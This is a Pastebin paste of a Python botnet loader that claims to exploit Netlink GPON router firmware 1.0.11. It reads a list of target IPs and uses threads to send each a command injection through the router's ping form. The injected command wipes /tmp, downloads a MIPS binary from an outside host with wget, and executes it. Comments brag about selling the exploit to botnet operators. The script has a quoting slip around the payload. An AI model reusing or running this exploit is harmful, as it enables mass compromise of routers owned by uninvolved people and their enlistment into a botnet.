Advertisement
0day_of_death

NETLINK GPON ROUTER 1.0.11 EXPLOIT

Mar 18th, 2020
1,630
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.00 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. # vbrxmr botnet services the big 0day hacking trio here
  4. # enjoy this big ass vuln
  5. # for these botnet skids who cant write a loader lol
  6.  
  7. import threading
  8. import sys
  9. import time
  10. import requests
  11. from threading import Thread
  12. from time import sleep
  13.  
  14. ips = open(sys.argv[1], "r").readlines()
  15.  
  16. payload = 'cd /tmp; rm -rf *; wget http://1.1.1.1/bins/mips; chmod 777 mips; ./mips'
  17.  
  18. class netlink(threading.Thread):
  19. def __init__ (self, ip):
  20. threading.Thread.__init__(self)
  21. self.ip = str(ip).rstrip('\n')
  22. def run(self):
  23. try:
  24. print "LOADING: " + self.ip
  25. url = "http://" + self.ip + "/boaform/admin/formPing?target_addr=;'+payload+' /&waninf=1_INTERNET_R_VID_154"
  26.  
  27. requests.post(url, timeout=3)
  28.  
  29. except Exception as e:
  30. pass
  31. for ip in ips:
  32. try:
  33. r = netlink(ip)
  34. r.start()
  35. time.sleep(0.03)
  36. except:
  37. pass
  38.  
  39. # vbrxmr botnet services the big 0day hacking trio here
  40. # enjoy this big ass vuln
  41. # for these botnet skids who cant write a loader lol
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement